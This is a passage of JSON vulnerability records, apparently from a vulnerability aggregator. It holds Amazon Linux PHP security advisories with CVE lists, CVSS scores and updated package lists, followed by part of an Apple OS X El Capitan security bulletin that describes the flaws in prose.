php56-dbg-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-opcache-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-cli-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-embedded-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-tidy-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-mbstring-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-gd-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-bcmath-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-pdo-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-gmp-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-imap-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-fpm-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-odbc-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-pspell-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-dba-5.6.14-1.119.amzn1.x86_64 \n \n \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-10-20T14:50:00", "type": "amazon", "title": "Medium: php56", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", 
"CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-7804"], "modified": "2016-03-16T16:30:00", "id": "ALAS-2015-601", "href": "https://alas.aws.amazon.com/ALAS-2015-601.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-27T19:37:06", "description": "**Issue Overview:**\n\nAs <a href=\"https://bugs.php.net/bug.php?id=69720\">reported upstream</a>, A NULL pointer dereference flaw was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash. (CVE-2015-7803 )\n\nA flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-6834, CVE-2015-6835, CVE-2015-6836)\n\nA NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets. (CVE-2015-6837, CVE-2015-6838)\n\nAs <a href=\"https://bugs.php.net/bug.php?id=70433\">reported upstream</a>, an uninitialized pointer use flaw was found in the phar_make_dirstream() function of PHP's Phar extension. A specially crafted phar file in the ZIP format with a directory entry with a file name \"/ZIP\" could cause a PHP application function to crash. 
(CVE-2015-7804)\n\n \n**Affected Packages:** \n\n\nphp55\n\n \n**Issue Correction:** \nRun _yum update php55_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 php55-embedded-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-bcmath-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-snmp-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-cli-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-mbstring-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-ldap-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-pgsql-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-pdo-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-pspell-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-dba-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-common-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-odbc-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-enchant-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-xml-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-soap-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-fpm-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-gmp-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-xmlrpc-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-opcache-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-process-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-debuginfo-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-mcrypt-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-devel-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-imap-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-mssql-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-mysqlnd-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-recode-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-tidy-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-intl-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-gd-5.5.30-1.110.amzn1.i686 \n \n src: \n 
\u00a0\u00a0\u00a0 php55-5.5.30-1.110.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 php55-cli-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-pdo-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-odbc-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-common-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-tidy-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-mbstring-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-intl-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-mysqlnd-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-mcrypt-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-fpm-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-process-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-dba-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-pspell-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-recode-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-mssql-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-debuginfo-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-bcmath-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-xml-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-imap-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-opcache-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-soap-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-xmlrpc-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-embedded-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-snmp-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-devel-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-enchant-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-gd-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-gmp-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-ldap-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-pgsql-5.5.30-1.110.amzn1.x86_64 \n \n \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-10-20T14:52:00", "type": "amazon", "title": "Medium: php55", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-7804"], "modified": "2016-03-16T16:30:00", "id": "ALAS-2015-602", "href": "https://alas.aws.amazon.com/ALAS-2015-602.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-25T19:27:36", "description": "**Issue Overview:**\n\nThe SplObjectStorage unserialize implementation in ext/spl/spl_observer.c in PHP before 7.0.12 does not verify that a key is an object, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access) via crafted serialized data. (CVE-2016-7480)\n\nUse-after-free vulnerability in the CURLFile implementation in ext/curl/curl_file.c in PHP 7.x before 7.0.12 allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that is mishandled during __wakeup processing. 
(CVE-2016-9137)\n\nStack consumption vulnerability in the gdImageFillToBorder function in gd.c in the GD Graphics Library (aka libgd) before 2.2.2, as used in PHP 7.x before 7.0.13, allows remote attackers to cause a denial of service (segmentation violation) via a crafted imagefilltoborder call that triggers use of a negative color value. (CVE-2016-9933)\n\next/wddx/wddx.c in PHP 7.x before 7.0.13 allows remote attackers to cause a denial of service (NULL pointer dereference) via crafted serialized data in a wddxPacket XML document, as demonstrated by a PDORow string. (CVE-2016-9934)\n\nThe php_wddx_push_element function in ext/wddx/wddx.c in PHP 7.x before 7.0.14 allows remote attackers to cause a denial of service (out-of-bounds read and memory corruption) or possibly have unspecified other impact via an empty boolean element in a wddxPacket XML document. (CVE-2016-9935)\n\nThe unserialize implementation in ext/standard/var.c in PHP 7.x before 7.0.14 allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via crafted serialized data. This vulnerability exists because of an incomplete fix for CVE-2015-6834. (CVE-2016-9936)\n\n \n**Affected Packages:** \n\n\nphp70\n\n \n**Issue Correction:** \nRun _yum update php70_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 php70-pspell-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-bcmath-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-mbstring-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-mysqlnd-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-mcrypt-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-imap-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-intl-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-xmlrpc-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-enchant-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-debuginfo-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-embedded-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-zip-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-dbg-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-soap-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-snmp-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-common-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-gd-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-ldap-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-gmp-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-cli-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-devel-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-tidy-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-xml-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-pdo-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-dba-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-process-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-recode-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-pgsql-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-pdo-dblib-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-fpm-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-opcache-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-json-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-odbc-7.0.14-1.20.amzn1.i686 \n \n src: \n 
\u00a0\u00a0\u00a0 php70-7.0.14-1.20.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 php70-embedded-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-json-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-pdo-dblib-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-common-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-intl-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-cli-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-soap-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-pspell-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-xmlrpc-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-zip-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-enchant-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-gd-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-mysqlnd-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-imap-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-recode-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-mcrypt-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-gmp-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-mbstring-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-xml-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-pdo-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-pgsql-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-debuginfo-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-dba-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-process-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-devel-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-fpm-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-ldap-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-bcmath-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-opcache-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-snmp-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-odbc-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 
php70-tidy-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-dbg-7.0.14-1.20.amzn1.x86_64 \n \n \n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-26T18:00:00", "type": "amazon", "title": "Medium: php70", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2016-7480", "CVE-2016-9137", "CVE-2016-9933", "CVE-2016-9934", "CVE-2016-9935", "CVE-2016-9936"], "modified": "2017-01-26T18:00:00", "id": "ALAS-2017-788", "href": "https://alas.aws.amazon.com/ALAS-2017-788.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2021-06-08T19:08:46", "description": "No description provided", "edition": 2, "cvss3": {}, "published": "2015-09-15T00:00:00", "title": "PHP multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2015-09-15T00:00:00", "id": "SECURITYVULNS:VULN:14694", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14694", "cvss": {"score": 7.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "description": "\r\n\r\nAPPLE-SA-2015-10-21-4 OS X El Capitan 10.11.1 and Security Update\r\n2015-007\r\n\r\nOS X El Capitan 10.11.1 and Security Update 2015-007 are now\r\navailable and address the following:\r\n\r\nAccelerate Framework\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted website may lead to arbitrary\r\ncode execution\r\nDescription: A memory corruption issue existed in the Accelerate\r\nFramework in multi-threading mode. This issue was addressed through\r\nimproved accessor element validation and improved object locking.\r\nCVE-ID\r\nCVE-2015-5940 : Apple\r\n\r\napache_mod_php\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Multiple vulnerabilities in PHP\r\nDescription: Multiple vulnerabilities existed in PHP versions prior\r\nto 5.5.29 and 5.4.45. These were addressed by updating PHP to\r\nversions 5.5.29 and 5.4.45.\r\nCVE-ID\r\nCVE-2015-0235\r\nCVE-2015-0273\r\nCVE-2015-6834\r\nCVE-2015-6835\r\nCVE-2015-6836\r\nCVE-2015-6837\r\nCVE-2015-6838\r\n\r\nATS\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted webpage may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in ATS. 
This issue\r\nwas addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-6985 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nAudio\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode\r\nDescription: An uninitialized memory issue existed in coreaudiod.\r\nThis issue was addressed through improved memory initialization.\r\nCVE-ID\r\nCVE-2015-7003 : Mark Brand of Google Project Zero\r\n\r\nAudio\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Playing a malicious audio file may lead to arbitrary code\r\nexecution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of audio files. These issues were addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-5933 : Apple\r\nCVE-2015-5934 : Apple\r\n\r\nBom\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Unpacking a maliciously crafted archive may lead to\r\narbitrary code execution\r\nDescription: A file traversal vulnerability existed in the handling\r\nof CPIO archives. This issue was addressed through improved\r\nvalidation of metadata.\r\nCVE-ID\r\nCVE-2015-7006 : Mark Dowd of Azimuth Security\r\n\r\nCFNetwork\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted website may lead to cookies\r\nbeing overwritten\r\nDescription: A parsing issue existed when handling cookies with\r\ndifferent letter casing. 
This issue was addressed through improved\r\nparsing.\r\nCVE-ID\r\nCVE-2015-7023 : Marvin Scholz; Xiaofeng Zheng and Jinjin Liang of\r\nTsinghua University, Jian Jiang of University of California,\r\nBerkeley, Haixin Duan of Tsinghua University and International\r\nComputer Science Institute, Shuo Chen of Microsoft Research Redmond,\r\nTao Wan of Huawei Canada, Nicholas Weaver of International Computer\r\nScience Institute and University of California, Berkeley, coordinated\r\nvia CERT/CC\r\n\r\nconfigd\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to elevate privileges\r\nDescription: A heap based buffer overflow issue existed in the DNS\r\nclient library. A malicious application with the ability to spoof\r\nresponses from the local configd service may have been able to cause\r\narbitrary code execution in DNS clients.\r\nCVE-ID\r\nCVE-2015-7015 : PanguTeam\r\n\r\nCoreGraphics\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted website may lead to arbitrary\r\ncode execution\r\nDescription: Multiple memory corruption issues existed in\r\nCoreGraphics. These issues were addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-5925 : Apple\r\nCVE-2015-5926 : Apple\r\n\r\nCoreText\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. 
These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-6992 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-6975 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-7017 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-5944 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nDisk Images\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in the parsing of\r\ndisk images. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-6995 : Ian Beer of Google Project Zero\r\n\r\nEFI\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: An attacker can exercise unused EFI functions\r\nDescription: An issue existed with EFI argument handling. 
This was\r\naddressed by removing the affected functions.\r\nCVE-ID\r\nCVE-2015-7035 : Corey Kallenberg, Xeno Kovah, John Butterworth, and\r\nSam Cornwell of The MITRE Corporation, coordinated via CERT/CC\r\n\r\nFile Bookmark\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Browsing to a folder with malformed bookmarks may cause\r\nunexpected application termination\r\nDescription: An input validation issue existed in parsing bookmark\r\nmetadata. This issue was addressed through improved validation\r\nchecks.\r\nCVE-ID\r\nCVE-2015-6987 : Luca Todesco (@qwertyoruiop)\r\n\r\nFontParser\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-5927 : Apple\r\nCVE-2015-5942\r\nCVE-2015-6976 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-6977 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-6978 : Jaanus K\u00e4\u00e4p, Clarified Security, working with HP's Zero\r\nDay Initiative\r\nCVE-2015-6991 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-6993 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-7009 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-7010 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-7018 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nFontParser\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. 
These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-6990 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-7008 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nGrand Central Dispatch\r\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted package may lead to\r\narbitrary code execution\r\nDescription: A memory corruption issue existed in the handling of\r\ndispatch calls. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-6989 : Apple\r\n\r\nGraphics Drivers\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local user may be able to cause unexpected system\r\ntermination or read kernel memory\r\nDescription: Multiple out of bounds read issues existed in the\r\nNVIDIA graphics driver. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-7019 : Ian Beer of Google Project Zero\r\nCVE-2015-7020 : Moony Li of Trend 